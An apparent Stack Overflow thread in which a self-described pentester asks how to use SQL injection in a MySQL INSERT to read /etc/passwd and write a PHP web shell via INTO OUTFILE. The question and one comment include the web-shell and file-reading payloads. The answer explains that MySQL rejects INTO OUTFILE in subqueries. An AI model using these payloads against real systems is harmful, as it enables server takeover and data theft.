# SELECT INTO OUTFILE in an INSERT MySQL Query

Tags: php, mysql, sql-injection

Here's an interesting scenario. During a recent pentest, I came across a SQL injection inside an INSERT query. The backend code looks something like this:

```
$sqlquery= "INSERT INTO sometable set col1='" + $_GET['param'] + "'";
```

I'm able to insert arbitrary values into the file and even use a SELECT sub query to insert the contents of '/etc/passwd' to the col1 inside sometable and read it later via a completely different functionality somewhere else in the application.

```
$sqlquery= "INSERT INTO sometable set col1='1', (SELECT load_file('/etc/passwd'))";
```

The challenge is to write a file to disk using INTO OUTFILE (I have FILE privs and the document root is writable by the MySQL user - verified). It looks like MySQL does not support the following:

```
$sqlquery= "INSERT INTO sometable set col1='1', (SELECT 'a' INTO OUTFILE '/tmp/data.txt')";
```

The aim is to write a php web shell in a folder where I have write permissions. The final query that needs to be executed is this:

```
 $sqlquery= "INSERT INTO sometable set col1='1', (SELECT '<?php system($_GET['x']) ?>' INTO OUTFILE'/var/www/app/imgupload/shell.php')";
```

MySQL expects data to be returned by sub-queries which is why the above statement does not seem to work since INTO OUTFILE will write data to disk instead of returning it to MySQL.

Do you think there is a workaround?

Comment: `+` is mathematical addition anyways. so you'd be doing `One plus (contents of file)`, which makes no logical sense. you'd need something like `col1=concat('1', load_file(...))`. And for your last statement, php is not recursively embeddable. you're already in "php mode" to build the $sql string, so the php code inside that string is **NOT** executed, and cannot be executed unless that code base does something moronic like `eval($sqlquery)`

Comment: There is no string concatenator `+` in PHP. So none of these lines would produce a working query.

Comment: But if you want to know how SQL injection works, there are tons of questions and answers around here.

Comment: @syck I got the impression, that OP knows sufficiently well, what an SQL injection is. The question is about whether a specific MySQL exploit could work.

Comment: I have my doubts at _sufficiently_ in conjunction with PHP syntax.

Comment: I'm sorry, i had forget to remove the + (used in links), i've said that the query works but not the INTO OUTFILE..

Comment: Check if multiqueries are executed? `INSERT INTO sometable set col1='1'; SELECT '<?php system($_GET['x']) ?>' INTO OUTFILE'/var/www/app/imgupload/shell.php'`. Also it may be beneficial to use `echo system([...], $return); var_dump($return);` to get the of any command you use.

Answer (score 5):

From http://dev.mysql.com/doc/refman/5.7/en/select-into.html

> An INTO clause should not be used in a nested SELECT because such a
>   SELECT must return its result to the outer context.

So the answer is no, I think.

Also see [mysql insert can't with select into outfile?](https://stackoverflow.com/questions/15746743/mysql-insert-cant-with-select-into-outfile)